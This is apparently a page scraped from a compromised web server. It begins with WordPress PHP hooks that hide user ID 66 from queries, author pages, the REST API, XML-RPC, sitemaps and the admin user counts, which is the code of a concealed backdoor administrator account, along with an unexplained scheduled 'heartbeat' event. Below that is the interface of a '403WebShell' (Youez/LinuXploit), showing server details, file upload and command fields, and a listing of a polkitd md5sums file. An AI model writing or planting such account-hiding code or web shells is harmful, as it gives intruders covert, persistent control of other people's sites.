add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/polkitd.md5sums
af9821b87ce8e51db5090b3455bc9105  usr/bin/pkaction
b5377e6372f3a3beb4f98052fc804065  usr/bin/pkcheck
b7c081448953f855e890547e5ce10a4c  usr/bin/pkttyagent
7c794427f656539b0d4659b030904fe0  usr/lib/pam.d/polkit-1
0f3192f4b6b7a0f975fa4bb7692f0304  usr/lib/polkit-1/polkit-agent-helper-1
5f54324a3e7e579477be8ef305346bc9  usr/lib/polkit-1/polkitd
b9fdffff3d1d0b8646b7d07c681648c2  usr/lib/systemd/system/polkit.service
3f96072536496641b47a6446c2b82820  usr/lib/sysusers.d/polkit.conf
36b3edf09c9d775437db4882b044080b  usr/lib/tmpfiles.d/polkitd.conf
110f5dd8190c63ff2f0c88cec01b206d  usr/share/bug/polkitd/control
72f9983158d59bc4a8b12ec8c1cbdf4b  usr/share/dbus-1/system-services/org.freedesktop.PolicyKit1.service
0dedb93eacf6345970d527e5d257cd20  usr/share/dbus-1/system.d/org.freedesktop.PolicyKit1.conf
322fa22bb403f4dcbd83146bf604b5c8  usr/share/doc/polkitd/NEWS.md.gz
6ea9f24c13c0cb242da276b0561c25df  usr/share/doc/polkitd/README.md
1f7a83c8c907767021fe7b0aafed9b77  usr/share/doc/polkitd/copyright
ad5fa6fc08680a6c1ef9f6ed957bfe18  usr/share/doc/polkitd/examples/50-local-allow.rules
0c28ae5b3a83ec1d42ba2256153e88f5  usr/share/doc/polkitd/examples/50-local-deny.rules
0e7036825c1aceb94016fe121cd7feb5  usr/share/lintian/overrides/polkitd
372538a7a14af5ff0728cf5fc1d26d48  usr/share/man/man1/pkaction.1.gz
5ab9e2f758cadf7341266f7ccc4cb5ed  usr/share/man/man1/pkcheck.1.gz
aa00fc6e78122cc45afc6a345e395887  usr/share/man/man1/pkttyagent.1.gz
22d8a22d4c4d2966d808a79baed858d7  usr/share/man/man8/polkit.8.gz
5d3cae5f38e2c07344ba3d7d08e98a04  usr/share/man/man8/polkitd.8.gz
406540d6c759ce128c68e0f3bd3fa2bb  usr/share/polkit-1/actions/org.freedesktop.policykit.policy
1169dcbb77d72cedc12bc8d57d1198d9  usr/share/polkit-1/policyconfig-1.dtd
d409d937357948631c07ffa1fe77b253  usr/share/polkit-1/rules.d/49-ubuntu-admin.rules
62a5bcae7b67280c4a52b8d167e8c825  usr/share/polkit-1/rules.d/50-default.rules
e147523d0dd70e23c1a774e317ddeee8  usr/share/xml/polkit-1/catalog.xml

Youez - 2016 - github.com/yon3zu
LinuXploit